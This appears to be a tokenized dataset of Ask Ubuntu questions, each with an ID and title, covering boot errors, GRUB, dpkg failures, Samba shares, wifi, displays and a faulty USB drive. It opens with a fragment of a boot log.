[ ok ] starting cold plug devices [ 122g [ ok ] starting log initial device creation [ 122g [ ok ] stopping set sysctls from /etc/sysctl.conf [ 122g [ ok ] stopping set console keymap [ 122g [ ok ] stopping load modules from /etc/modules [ 122g [ ok ] starting uncomplicated firewall [ 122g [ ok ] starting set console font [ 122g [ ok ] stopping set console font [ 122g [ ok ] starting userspace bootsplash [ 122g [ ok ] starting send an event to indicate plymouth is up [ 122g [ ok ] starting configure network device security [ 122g [ ok ] starting configure network device security [ 122g [ ok ] starting configure network device security [ 122g [ ok ] starting configure network device [ 122g [ ok ] starting configure network device [ 122g [ ok ] starting mount network filesystems [ 122g [ ok ] stopping mount network filesystems [ 122g [ ok ] starting bridge socket events into upstart [ 122g [ ok ] starting configure network device [ 122g [ ok ] starting signal sysvinit that the rootfs is mounted [ 122g [ ok ] starting clean /tmp directory [ 122g [ ok ] stopping clean /tmp directory [ 122g [ ok ] stopping read required files in advance ( for other mountpoints ) [ 122g [ ok ] stopping read required files in advance ( for other mountpoints ) [ 122g [ ok ] starting signal sysvinit that local filesystems are mounted [ 122g [ ok ] stopping mount filesystems on boot [ 122g [ ok ] starting flush boot log to disk [ 122g [ ok ] starting flush early job output to logs [ 122g [ ok ] stopping failsafe boot delay [ 122g [ ok ] starting system v initialisation compatibility [ 122g [ ok ] stopping flush early job output to logs [ 122g [ ok ] starting bridge file events into upstart [ 122g [ ok ] starting system logging daemon [ 122g [ ok ] starting d-bus system message bus [ 122g [ ok ] starting systemd login management service [ 122g [ ok ] starting modem connection manager [ 122g [ ok ] starting configure network device security [ 122g [ ok ] stopping cold plug devices [ 122g [ ok ] stopping log initial device creation [ 122g [ ok ] starting configure network device security [ 122g [ ok ] starting save udev log and update rules [ 122g [ ok ] stopping save udev log and update rules [ 122g [ ok ] starting configure virtual network devices [ 122g [ ok ] starting mdns/dns-sd daemon [ 122g [ ok ] starting reload cups , upon starting avahi-daemon to make sure remote queues are populated [ 122g [ ok ] stopping reload cups , upon starting avahi-daemon to make sure remote queues are populated [ 122g [ ok ] starting bluetooth daemon [ 122g [ ok ] starting network connection manager [ 122g [ ok ] stopping userspace bootsplash [ 122g [ ok ] stopping flush boot log to disk [ 122g [ ok ] skipping profile in /etc/apparmor.d/disable : usr.bin.firefox skipping profile in /etc/apparmor.d/disable : usr.sbin.rsyslogd starting apparmor profiles [ 170g [ 164g [ ok ] setting up x socket directories ... [ 170g [ 164g [ ok ] stopping system v initialisation compatibility [ 122g [ ok ] starting system v runlevel compatibility [ 122g [ ok ] starting anac ( h ) ronistic cron [ 122g [ ok ] starting save kernel messages [ 122g [ ok ] starting regular background program processing daemon [ 122g [ ok ] stopping restore sound card state [ 122g [ ok ] starting cups-browsed - bonjour remote printer browsing daemon [ 122g [ ok ] starting acpi daemon [ 122g [ ok ] starting automatic crash report generation [ 122g [ ok ] starting cpu interrupts balancing daemon [ 122g [ ok ] stopping save kernel messages [ 122g [ ok ] speech-dispatcher disabled ; edit /etc/default/speech-dispatcher saned disabled ; edit /etc/default/saned restoring resolver state ... [ 170g [ 164g [ ok ] starting crash report submission daemon [ 122g [ ok ]
521217	twitter.com ( ssl ) not loading	if i 'm trying to go on https : //twitter.com it just timeout on firefox . if i use curl : vayan @ vayan-desktop : ~ $ curl -v https : //twitter.com * rebuilt url to : https : //twitter.com/ * hostname was not found in dns cache * trying 199.16.156.70 ... * connected to twitter.com ( 199.16.156.70 ) port 443 ( # 0 ) * successfully set certificate verify locations : * cafile : none capath : /etc/ssl/certs * sslv3 , tls handshake , client hello ( 1 ) : * sslv3 , tls handshake , server hello ( 2 ) : * sslv3 , tls handshake , cert ( 11 ) : * sslv3 , tls handshake , server key exchange ( 12 ) : * sslv3 , tls handshake , server finished ( 14 ) : * sslv3 , tls handshake , client key exchange ( 16 ) : * sslv3 , tls change cipher , client hello ( 1 ) : * sslv3 , tls handshake , finished ( 20 ) : * unknown ssl protocol error in connection to twitter.com:443 * closing connection 0 curl : ( 35 ) unknown ssl protocol error in connection to twitter.com:443 or timeout . any idea what could do that ? it 's only doing that on twitter nowhere else..
521222	how to unload a kernel module which is in use ?	i 'm following this tutorial to get my card reader working : http : //ubuntuforums.org/showthread.php ? t=636867 however i 'm unable unload my sdhci module : sudo modprobe -rv sdhci mmc_core mmc_block modprobe : fatal : module sdhci is in use . how should i proceed ?
521223	think or swim not working on 12.04 or 14.04	i recently allowed the auto upgrade from 12.04 to 14.04 . consequently thinkorswim stopped working . i re-installed thinkorswim , ubuntu 12.04 and wine . still it does not work . i have seen in the blogs that the latest upgrade to thinkorswim is the cause . any suggestions on how to get it working again will be vastly appreciated .
521224	find old directories ?	so , i 'm on lubuntu 14.04 , and i recently renamed my home folder and computer using sudo . so , the problem is , all the files that i had ( pictures , downloads , etc ) were on the old directory , and i ca n't find them . can someone help , or are they gone ?
521225	filesytem check or mount failed on system upgrade	i tried to do a system upgrade , and everything seemed correctly , but after restart the system did n't boot and receive this error filesystem check or mount failed there 's several answers here and here where recommend to do : mount -o remount , rw / dpkg -- configure -a mount -o remount , ro / sync reboot but after first and third command i got : ext4-fs ( sda5 ) : re-mounted . opts : errors=remount-ro what else should i try ? edit although the message seems to be normal , still the system ca n't boot . any ideas ?
521228	how can i select images within a date range with darktable ?	i can select fotos within darktable that are within a date range ? i can select fotos by exact date or truncated ( with `` % '' ) date in the `` collect images '' tool . is there something similar for date ranges ?
521230	how do i report a bug for non official releases	i have upgraded to ubuntu 14.10 . now experiencing an error . how to report the bug to 14.10 developer community and help to build a better ubuntu . the letters of the text are replaced with some blocks . see the pic the problem with the letters is system wide . how can i report it ? ? after 1 day found answer : i just call sudo apt-get update it fixed all the bugs . the beta is a daily build one .
521233	is there any way that i can use ubuntu 13.04 since it is no longer supported ?	i ( regrettably ) upgraded my desktop to ubuntu 14.04 but have been disappointed in performance of certain applications . is it possible to download any software so that i can use 13.04 even though it is no longer supported ?
521234	my flashplugin does n't work on firefox	i have ubuntu 14.04 . i 'm using firefox to browse the web and it worked properly but just a few days ago after i used sudo apt-get upgrade and sudo apt-get update it keeps telling me to install flashplugin . i even reinstalled my flashplugin but it still does n't work . what should i do ? !
521237	ubuntu 14.04 on macbook air 6,1 nr_cpus=1	after i installed ubuntu 14.04 along side osx with refind , selecting ubuntu ( or previously xubuntu ) , then ubuntu from the grub menu just gives a purple screen . i changed the grub config from `` quiet splash '' to `` nomodeset '' and saw it was hanging while looking for cpus . i then added `` nr_cpus=1 '' to the /linux/ line in grub config and it boots . however , performance is sluggish and i suspect this is due to only using one cpu . i 've read that installing ubuntu in efi mode fixes this but i ca n't find any option or information to do this . how do i get the full performance of the macbook air ?
521239	is it okay to sell linux distributions ?	here some people have made distributions based on ubuntu and they 're charging a price for it . is this legal ?
521241	i have two cursors on my screen , one of which is always on top and will never move - how do i remove it ?	ubuntu 14.04 first off i 'm sorry if the title/context of my post are a little confusing ; i 'm a tech noob and have just started with ubuntu after a system crash on my laptop . i got tired of using windows and decided to make the jump . i 've run into a few issues but the one that i ca n't seem to find an answer to on askubuntu or google is that i have two mice cursors - one of which is mine ( it flys around and is fine ) the other is always in the middle of the screen and even after a reset is still there . i 've only the one mouse plugged in , a desktop usb cooling tray and that 's it - no second mouse plugged in to speak of.. anyway , if you do reply if you could break it down for me as simple as possible - as when people talk about `` kernels '' and `` going into shells '' i think of apricots : ) edit : added xinput -- list ubuntuna @ ubuntuna : ~ $ xinput -- list ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ microsoft microsoft notebook/mobile optical mouse 2.0id=11 [ slave pointer ( 2 ) ] ⎜ ↳ synps/2 synaptics touchpad id=13 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ video bus id=8 [ slave keyboard ( 3 ) ] ↳ power button id=9 [ slave keyboard ( 3 ) ] ↳ hp webcam id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=12 [ slave keyboard ( 3 ) ] ↳ hp wmi hotkeys
521243	error : you need to load the kernel first	please help me . i accidentally deleted my grub partition when trying to reinstall ubuntu 14.10 . i have a bootable usb and working windows 8.1 on my computer . i 'm stuck in a command line version of grub . whenever i try to use the `` boot '' command i get an error `` you need to load the kernel first '' any help at all is appreciated . i would like to install grub again or boot into my usb or windows .
521246	lan party network usage statistics	me and couple of my friends have decided to make a lan party around 40 to 50 players . i have couple of conserns i need to find solutions for . dhcp server i have now installed a dhcp server ( in virtual box ubuntu 14.04 lts ) and it worked . here 's how i did it https : //www.youtube.com/watch ? v=9vc6-0smd64 bandwidth management possibly with the dhcp server , can i get some sort of statistics of the network such as current bandwidth usage per device . i 'd be great to see network usage per device or in this case a player . that would make it a heck of a lot easier to track down bandwidth eaters aka `` torrenting '' since there is not a lot of bandwith to just give away . i installed app called etherape to the dhcp server , selected eth0 as the interface and it shows connections , but it would be very hard to track down a single pc out there , because etherape also lists the target . i 'd like it to be like a list , possibly in ubuntu terminal . for example : user @ hostname $ any command that outputs this | pc | lan |â current usage | total usage / | | -- | -- -- -- -- -- -- â | -- -- -- -- -- -- - | -- -- -- -- -- -- -- | | 1 | 192.168.1.20 | 4.687 mbps | 1.256 gbps | | 2 | 192.168.1.21 | 12.57 mbps | 103.25 mbps | | 3 | 192.168.1.23 | 0.245 mbps | 12.144 mbps | block connection if player is using too much data all the time , having 20 tabs of youtube playing 4k or torrenting a lot of files then block internet for that lan ip . this function should be used as manual because i could just kindly ask for the player to stop or i cut down the internet . user @ hostname $ blockinternet [ lan ip ] [ interval ] also if all of this could be done without proxy server then ubuntu really rocks . proxyless so players feel like home when they come . plug and play . no proxy settings needed to be done . these features are not required to make a lan party but if someone starts to ddos or torrent i would be great to have a tool to ban that pc for like 10 minutes ( via ssh obviously ; ) i know this a lot to ask , but i have googled for couple days now still without a solution . thanks !
521247	unzip ( info-zip ) permissions	is there a way to invoke unzip ( from info-zip ) without having it restore the permissions stored in the zip file ? the zip files i 'm restoring are enormous , so going back over the contents with something like `` chmod -r '' will take a while . i do not control the source of the archives , so my only choice is to handle the permissions on extraction . thanks
521248	how to fix very well the problem from pulse audio error on ubuntu 14	well , recently i have an a problem with pulse audio software on ubuntu 14 . i was searching some solutions but never i get it . so , in this post i will to share us how to fix the problem with pulse audio when this tell you `` connection failed '' or something like this . well , the first that we have to do is open a terminal and write in there . sudo apt-get remove pavucontrol then , we will write in there the next command line . sudo apt-get purge pavucontrol then sudo apt-get update next and finish to write and reinstall pulse audio with the next line sudo apt-get install pavucontrol and that it 's all . greetings !
521252	error with dpkg	when i try to install anything , i get an error . ex : diego @ diego-satellite-c655 : ~ $ sudo apt-get install spotify-client reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libgconf2-4 recommended packages : libavcodec53 libavcodec52 libavcodec-extra-53 libavcodec-extra-52 libavformat53 libavformat52 libavformat-extra-53 libavformat-extra-52 the following new packages will be installed : libgconf2-4 spotify-client 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . 5 not fully installed or removed . need to get 0 b/55.1 mb of archives . after this operation , 130 mb of additional disk space will be used . do you want to continue ? [ y/n ] y selecting previously unselected package libgconf2-4 : amd64 . ( reading database ... 198538 files and directories currently installed . ) preparing to unpack ... /libgconf2-4_3.2.6-0ubuntu2_amd64.deb ... unpacking libgconf2-4 : amd64 ( 3.2.6-0ubuntu2 ) ... selecting previously unselected package spotify-client . preparing to unpack ... /spotify-client_1 % 3a0.9.11.27.g2b1a638.81-1_amd64.deb ... unpacking spotify-client ( 1:0.9.11.27.g2b1a638.81-1 ) ... setting up libsane : amd64 ( 1.0.23-3ubuntu3.1 ) ... dpkg : error processing package libsane : amd64 ( -- configure ) : can not compute md5 hash for file '/etc/sane.d/v4l.conf.dpkg-new ' : failed to read ( input/output error ) dpkg : dependency problems prevent configuration of hplip : hplip depends on libsane ( = 1.0.11-3 ) ; however : package libsane : amd64 is not configured yet . dpkg : error processing package hplip ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of printer-driver-postscript-hp : printer-driver-postscript-hp depends on hplip ( = 3.14.3-0ubuntu3.2 ) ; however : package hplip is not configured yet . dpkg : error processing package printer-driver-postscript-hp ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of sane-utils : sane-utils depends on libsane ; however : package libsane : amd64 is not configured yet . dpkg : error processing package sane-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependencyno apport report written because the error message indicates its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already problems prevent configuration of simple-scan : simple-scan depends on libsane ( = 1.0.11-3 ) ; however : package libsane : amd64 is not configured yet . dpkg : error processing package simple-scan ( -- configure ) : dependency problems - leaving unconfigured setting up libgconf2-4 : amd64 ( 3.2.6-0ubuntu2 ) ... setting up spotify-client ( 1:0.9.11.27.g2b1a638.81-1 ) ... errors were encountered while processing : libsane : amd64 hplip printer-driver-postscript-hp sane-utils simple-scan e : sub-process /usr/bin/dpkg returned an error code ( 1 ) after `` sudo dpkg -- configure -a '' diego @ diego-satellite-c655 : ~ $ sudo dpkg -- configure -a setting up libsane : amd64 ( 1.0.23-3ubuntu3.1 ) ... dpkg : error processing package libsane : amd64 ( -- configure ) : can not compute md5 hash for file '/etc/sane.d/v4l.conf.dpkg-new ' : failed to read ( input/output error ) dpkg : dependency problems prevent configuration of simple-scan : simple-scan depends on libsane ( = 1.0.11-3 ) ; however : package libsane : amd64 is not configured yet . dpkg : error processing package simple-scan ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hplip : hplip depends on libsane ( = 1.0.11-3 ) ; however : package libsane : amd64 is not configured yet . dpkg : error processing package hplip ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of sane-utils : sane-utils depends on libsane ; however : package libsane : amd64 is not configured yet . dpkg : error processing package sane-utils ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of printer-driver-postscript-hp : printer-driver-postscript-hp depends on hplip ( = 3.14.3-0ubuntu3.2 ) ; however : package hplip is not configured yet . dpkg : error processing package printer-driver-postscript-hp ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libsane : amd64 simple-scan hplip sane-utils printer-driver-postscript-hp also , there 's no available file in my dpkg folder . could anyone send me his to replace mine ?
521253	replacing windows xp completely to ubuntu ( booting issues )	i am trying to replace my old existing windows xp ( service pack 3 ) completely with ubuntu latest desktop version over the last two days with no sucess due to the following : created both a bootable usb , and dvd loaded both with new boot files , despite many attempted changing bios settings and boot sequences . computer refuses to boot from these devices . all files are present and correct in both the created dvd & bootable usb formats but all i get is continued black sceen stating : remove disks or other media - press any key to restart . i have to remove usb stick , otherwise press any key results in repeated request . i then hear dvd spinning followed by : no boot device available - strike f1 to retry boot , f2 for setup utility assistance would be most appreciated !
521254	how to fix : can not install minitube-ubuntu after full update / upgrade to 14.04 ?	genesis i can not install minitube-ubuntu on my 14.04 ubuntu x64 machine . was working on 12.04 for sure . i do n't remember if it broke on upgrade to 14.04 or later on related packages upgrade . older minitube works fine , but up-to-date supported version which is minitube-ubuntu , does not . to the point i got a track of errors on minitube-ubuntu install , those come to phonon-backend-vlc as a required package , but that one eventually wants libvlccore7 : wymaga : vlc-data ( = 2.1.5+ppa1 ) ale 2.2.0+ppa2.1 ma zostaä zainstalowany . why later version of vlc-data does not pass validation ... ? is n't that a bug ? i am currently using phonon-backend-gstreamer1.0 and phonon-backend-gstreamer instead - for older minitube . i have tried degrading vlc-data version and all cascade of the packages versions , but as i remember something still was not working so upgraded to latest again ... installing phonon-backend-gstreamer which should be replacement of vlc one , same error though as gstreamer could not be accepted .
521256	error messages on reboot	i have no idea what 's going on ; this is my son 's laptop . when i try to reboot , the following comes up : *stopping save kernel messages [ ok ] *cpu1 ... * stop *cpufreq utilities : setting ondemand cpufreq governor ... [ ok ] ping cold plug devices [ ok } *stopping log initial device creation [ ok ] *starting enable remaining boot-time encrypted block devices [ ok ] *starting configure network device security [ ok ] *starting configure virtual network devices [ ok ] speech-dispatcher disabled ; edit/etc/default/speech-dispatcher *stopping enable remaining boot-time encrypted block devices [ ok ] *stopping configure virtual network devices [ ok ] aned disabled ; edit/etc/default/saned [ ok ]
521258	wifi and bluetooth are n't working on my hp pavillion lap with ubuntu 14.04 lts	please help me . wifi and bluetooth are n't working in my hp pavilion laptop . network controller is mediatek corp. mt7630e 802.11 and bluetooth usb controller [ 0c03 ] : intel corporation lynx point-lp usb xhci hc [ 8086:9c31 ] ( rev 04 ) ( prog-if 30 [ xhci ] ) bgn
521260	how do i get a display resolution above 1024x768 on my ati radeon x800	i 've been bashing my head against this for the last few hours on and off . i 've a pretty archaic graphics card ( radeon x800 ) connected up to a 37 '' samsung smart tv and i 'll be damned if i can get the resolution above 1024x768 . i 've tried following various guides using xrandr and xorg.config with no success . even booting into recovery mode to create xorg.config did n't help me as it spat out an error saying the directory did n't exist and dumped out a file called `` xorg.config.new '' into my home folder . xrandr is n't helping either , i 've followed guides to add new modes and always get to this : xrandr : failed to get size of gamma for output default i 'm running the latest version of ubuntu , this is my first time on ubuntu and apart from trying fedora out a few times it 's my first really serious time on linux so i could be doing something wrong . any help would be much appreciated , especially by my girlfriend who 's getting cranky with me sitting here trying to sort this out .
521265	how to install sublime text 2 on ubuntu 14.04	all tutorials on installing st2 on ubuntu describe 2 ways : manual way of downloading the tar from the official website , extracting it , moving it to /opt/ , creating a symlink and start menu entry etc . automatic way , consisting of these commands : commands : sudo add-apt-repository ppa : webupd8team/sublime-text-2 sudo apt-get update sudo apt-get install sublime-text the problem is that this actually installs st3 and not st2 . why i think so ? when i start it , the title of the program is only sublime text and not sublime text 2 . help - > about sublime text shows this : so my question is - have they removed st2 from the webupd8team/sublime-text-2 repo and replaced it with st3 ? is there a way to install st2 using apt-get ?
521269	tried to install ubuntu . it failed . now i 'm at a grub screen . what is this and how do i resolve it ?	i just built my computer . brand new everything . i tried to install ubuntu . i filled out the screen that asks you to assign a name to the computer , create a password , etc . when tried to continue , the screen said that i had an `` unofficial copy '' of ubuntu . what did i do wrong . now when i put a usb in the screen is black and says gnr grub version 2.02 at the top . what do i do from here ? i 've been googling all day and have gotten nowhere . i tried boot-repair-disc and nothing happened .
521270	( solved ) giving write permissions to partition in order to set steam library there	using ubuntu 14.04 . i am a very noob user . i have got two disks on my computer : an sdd and a hdd . i have just installed ubuntu in my sdd device , and as my ssd disk is a 60gb one , i want to install games and some stuff in my hdd device . the problem comes when i try to do it using the steamlibrary set options in the menu , and i got the warning ''this is an only-read device '' . my partitions : sdd device ( sda ) : sda1 , format ntfs , where i do have windows 8 installed sda2 , some small windows system partition sda3 , extended partition : sda5 , format ext4 , my ubuntu partition sda6 , format linux-swap hdd device ( sdb ) : sdb1 , format ext4 , where i want to install those linux steam games sdb2 , format ntfs , for some windows software sdb3 , format ntfs , for movies and stuff hope i gave all information needed , i guess i have to give to my own user some kind of basic write and execute permissions but i 'm nothing but a noob user to this os . thank you very much for your time . sorry for my bad english . greetings edit : i am using ubuntu 14.04 . i think i missed in which year am i living in . apologies . edit 2 : solved on my own . ty .
521273	macintosh hd will only mount ro , because it is journaled	a little history first , i 've installed 14.04 on another partition of a macbook 5.1 because of a completely botched mavericks upgrade which has left os x unusable . i had to use refind to get it to attempt to boot to the old ( snow leopard , i think ) os partition , which will spin endlessly and never complete . at this point all i want to do is get some files off of the `` macintosh hd '' partition from a user folder , which is of course restricted by default . chmod'ing the directory does not work because the partition mounts read-only , which i 've recently discovered is because that volume is journaled , but that is what i 'm trying to fix . i 'm not an advanced linux user , so i 'm sure there are utilities i could be using that i 'm unaware of and my google fu has n't lead me to . first , sudo mount -t hfsplus -o rw , remount -force /dev/sda2 /media/mac ( of course after first unmounting /dev/sda2 from the default /media/me/macintosh hd mount point ) did not have an effect . however , adding the following line to my fstab uuid=61ba4438-95d6-39e5-8d60-0735e28dc132 /media/mac hfsplus defaults 0 2 did manage to successfully change the mount point to /media/mac , but sadly it is still read only according to the error message i get trying to run chmod on it . i ran fsck -f /dev/sda2 and got this output : fsck from util-linux 2.20.1 ** /dev/sda2 ** checking hfs plus volume . ** checking extents overflow file . ** checking catalog file . ** volume check failed . edit 2 : note that i had to use the -f , running it without that tells me that the utility can not be run because the volume is journaled . more on that below ... the mac disk manager utility ( which i get to through the mavericks install boot ) reports some permissions errors , but the drive is also read only there , so it ca n't fix them ! if someone thinks they might now how to help me , i can get the output from that process . any pointers would be appreciated . edit : a little more research has led me to understand a bit more about the root of the problem . according to various installation guides , mavericks requires you to move to a journaled file system . so , i 'm betting during the failed installation it started ( and likely finished ) this conversion before something ( else ? ) went wrong . all my research is also telling me that ubuntu ( and i presume other linux distros ) does not support mounting a journaled file system in read/write mode . there is a link to a proposed process for removing the journaling from ubuntu in this ubuntuforums thread , and i 'm probably going to wind up giving that a shot as painful as it sounds , but i was hoping someone could propose any other methods for either removing journaling or getting the data out of the restricted directory another way . for example , i tried using the data recovery tool in gparted with no luck .
521277	can not execute program binary go-enc2ly	i 've been attempting to execute a `` go-enc2ly '' , which is command line way of converting .enc encore files into lilypond format . i 've installed the go complier suite , ran the commands : mkdir /tmp/go export gopath=/tmp/go go get github.com/hanwen/go-enc2ly and like the website says : /tmp/go/bin/go-enc2ly will then contain the program binary . the website is https : //github.com/hanwen/go-enc2ly however , when i tried to execute the file from the interface , and nothing happened . then i executed jim @ fedora : ~ $ cd '/tmp/go/bin ' jim @ fedora : /tmp/go/bin $ ./go-enc2ly 2014/09/07 16:39:47 readfileopen : no such file or directory i tried moving the file to a different directory and executing , but that did n't work either . what should i do to make go-enc2ly run ?
521278	mceusb remote does n't work with usb3 on 12.04	i have a mceusb ir remote on 12.04 : bus 003 device 004 : id 1784:0008 topseed technology corp. ehome infrared transceiver which works fine on a usb2 port but does n't on usb3 . motherboard : asus p8z77-v turning on debug in mceusb.c shows that on usb2 i 'm getting short packets ( 1 or 2 samples ) from ehci sep 7 14:39:22 ws1 kernel : [ 68354.922075 ] mceusb 2-1.6:1.0 : rx data : 81 8a ( length=2 ) sep 7 14:39:22 ws1 kernel : [ 68354.922079 ] mceusb 2-1.6:1.0 : raw ir data , 1 pulse/space samples sep 7 14:39:22 ws1 kernel : [ 68354.922082 ] mceusb 2-1.6:1.0 : storing pulse with duration 500000 sep 7 14:39:22 ws1 kernel : [ 68354.922085 ] mceusb 2-1.6:1.0 : processed ir data , calling ir_raw_event_handle but on usb3 i get larger packets from xhci sep 7 14:41:03 ws1 kernel : [ 68456.047737 ] mceusb 3-3:1.0 : processed ir data , calling ir_raw_event_handle sep 7 14:41:03 ws1 kernel : [ 68456.079764 ] mceusb 3-3:1.0 : rx data : 8b 0f 8b 07 8b 07 8a 10 8b 10 9c 11 ( length=12 ) sep 7 14:41:03 ws1 kernel : [ 68456.079768 ] mceusb 3-3:1.0 : raw ir data , 11 pulse/space samples sep 7 14:41:03 ws1 kernel : [ 68456.079771 ] mceusb 3-3:1.0 : storing space with duration 750000 ... sep 7 14:41:03 ws1 kernel : [ 68456.079799 ] mceusb 3-3:1.0 : processed ir data , calling ir_raw_event_handle sep 7 14:41:03 ws1 kernel : [ 68456.111723 ] mceusb 3-3:1.0 : rx data : 9e 8a 07 8b 07 8a 08 8a 08 8a 08 8a 07 8a 08 8a 08 8a 08 8a 08 92 08 8a 08 8a 08 8a 10 8a 08 ( length=31 ) sep 7 14:41:03 ws1 kernel : [ 68456.111729 ] mceusb 3-3:1.0 : raw ir data , 30 pulse/space samples sep 7 14:41:03 ws1 kernel : [ 68456.111732 ] mceusb 3-3:1.0 : storing pulse with duration 500000 ... the contents are generally the same but for usb3 the samples are truncated after the 30 sample packet . xmode2 shows the full output for usb2 but is truncated for usb3 i 've applied the patch from http : //pastebin.com/reqhteke however , usb_endpoint_xfer_int ( ) returns true so bulk transfer code is not invoked . also i removed sending get_emver in mceusb_get_emulator_version ( ) as sending device_resume seems to flush the results from xhci . although i could use a usb2 port on my motherboard to get around this , the real target is a asus chromebox which only has usb3 ports . this is below lirc so it 's config is not relevant .
521281	upgrading ubuntu when having drivers from xorg-edgers	i noticed that xorg-edgers had some warning about ubuntu distro upgrade . what is the problem exactly ? do i really need to completely remove my nvidia drivers when i do a distro upgrade ? and would this be the case with the default drivers that ubuntu it self provides in additional drivers ? i am on 14.04 release and i am just thinking ahead for the upcoming 14.10 upgrade . i am using the 340 driver from xorg-edgers . i used the guide here : http : //www.ubuntuupdates.org/ppa/xorg-edgers to add the ppa . as you can see there are also some important notices there which talk about the subject i am trying to ask about in here .
521283	networkmanager and rfkill on boot	i 've been trying to setup my ubuntu as an access point that would work on boot . i have hostapd , dhcpd and some iptables forwarding rules that all work well . but i 'm running into some issue with networkmanager , which seems to rfkill my wifi card everytime on boot $ sudo rfkill list 1 : phy0 : wireless lan soft blocked : yes hard blocked : no i have tried putting a `` rfkill unblock wlan '' in a bunch of places ( rc.local , init.d , .. ) , but i think networkmanager takes over and blocks it again . i think it might be because of this : $ nmcli nm wifi wifi disabled even though my card is not actually managed by network manager : $ nmcli device wlan0 802-11-wireless unmanaged so far the only option i have found is to entirely disable network manager globally : echo `` manual '' | sudo tee /etc/init/network-manager.override i 'm wondering if there is an option that would let me keep the networking manager for the other devices , but not manage my wifi card and not rfkill everytime on boot .
521286	problem accessing windows share from ubuntu using samba	i 'm trying to connect to my windows share from ubuntu , and i ca n't access it although i can access my users folder . the share works fine when i 'm connecting from a windows computer , so the problem lies between ubuntu and windows . here 's an overview of what happens when i 'm using smbclient -l 192.168.1.201 domain= [ tick-pc ] os= [ windows 8.1 pro 9600 ] server= [ windows 8.1 pro 6.3 ] sharename type comment -- -- -- -- - -- -- -- -- -- - admin $ disk administration à distance c $ disk partage par défaut e $ disk partage par défaut f $ disk partage par défaut ipc $ ipc ipc distant media disk print $ disk pilotes d’imprimantes users disk connection to 192.168.1.201 failed ( error nt_status_resource_name_not_found ) netbios over tcp disabled -- no workgroup available i tried to force the activation of netbios over tcp , but it did n't fix it . i tried uninstalling windows live sign in id assistant , it did n't fix it . sudo mount -t cifs //192.168.1.201/media /mnt/media -o username=tick did n't work either : mount error ( 5 ) : input/output error refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) i 'm at a loss atm any help please ? edit : i found out that i can share folders on my sdd and internal hard drive just fine , so the problem lies with the external hd .
521287	multiple operating systems on one computer	can i have ubuntu and windows 7 on the same computer ? if so , how do i do this ? i want to be able to choose which operating system to boot up to when i turn on my computer .
521288	ubuntu linux 14.04 lts server edition information need	i was wondering what 's the maximum ram , and maximum cpus does the ubuntu linux 14.04 lts server edition can handle . i found a server computer i want to buy , which is a superserver 4048b-trft . i do n't want to over buy something that ; something else does n't support , or can handle .
521290	usb pen ( kingston 16gb ) is not detecting / mount in the system ( ubuntu 12.10 or windows )	my usb pen ( kingston 16gb ) is not detecting in the system ( ubuntu 12.10 or windows ) . i tried followings but no any luck . could any one give an idea to try ... i want it with / without current data on it . it is displaying for lsusb namal @ namal : ~ $ lsusb bus 002 device 017 : id 0951:1642 kingston technology dt101 g2 it says `` disk /dev/sdc does n't contain a valid partition table '' for fdisk -l namal @ namal : ~ $ sudo fdisk -l disk /dev/sdc : 15.5 gb , 15479597056 bytes 64 heads , 32 sectors/track , 14762 cylinders , total 30233588 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2abd9350 disk /dev/sdc does n't contain a valid partition table then i tried to create some partitions as follows . but failed with error closing file when writing the partition . namal @ namal : ~ $ sudo fdisk /dev/sdc device contains neither a valid dos partition table , nor sun , sgi or osf disklabel building a new dos disklabel with disk identifier 0x1683c1c4 . changes will remain in memory only , until you decide to write them . after that , of course , the previous content wo n't be recoverable . warning : invalid flag 0x0000 of partition table 4 will be corrected by w ( rite ) command ( m for help ) : n partition type : p primary ( 0 primary , 0 extended , 4 free ) e extended select ( default p ) : p partition number ( 1-4 , default 1 ) : using default value 1 first sector ( 2048-30233587 , default 2048 ) : using default value 2048 last sector , +sectors or +size { k , m , g } ( 2048-30233587 , default 30233587 ) : using default value 30233587 command ( m for help ) : w the partition table has been altered ! calling ioctl ( ) to re-read partition table . error closing file i tried to write some zeros to there and it is succeeded . namal @ namal : ~ $ sudo dd if=/dev/zero of=/dev/sdc bs=512 count=1 1+0 records in 1+0 records out 512 bytes ( 512 b ) copied , 39.2583 s , 0.0 kb/s tried some fsck commands as well . namal @ namal : ~ $ sudo fsck /dev/sdc fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) ext2fs_open2 : bad magic number in super-block fsck.ext2 : superblock invalid , trying backup blocks ... fsck.ext2 : bad magic number in super-block while trying to open /dev/sdc the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device & gt ; namal @ namal : ~ $ sudo e2fsck -b 8193 /dev/sdc e2fsck 1.42.5 ( 29-jul-2012 ) e2fsck : attempt to read block from filesystem resulted in short read while trying to open /dev/sdc could this be a zero-length partition ? i tried to format it using fat32 . it hangs for so long but no results . ntfs asking for partitions . sudo mkfs.vfat -n 'asiri ' -i /dev/sdc this is how it looks like in gparted . now i 'm trying devices > create a new partition table . it throws io error ... result : an io error..
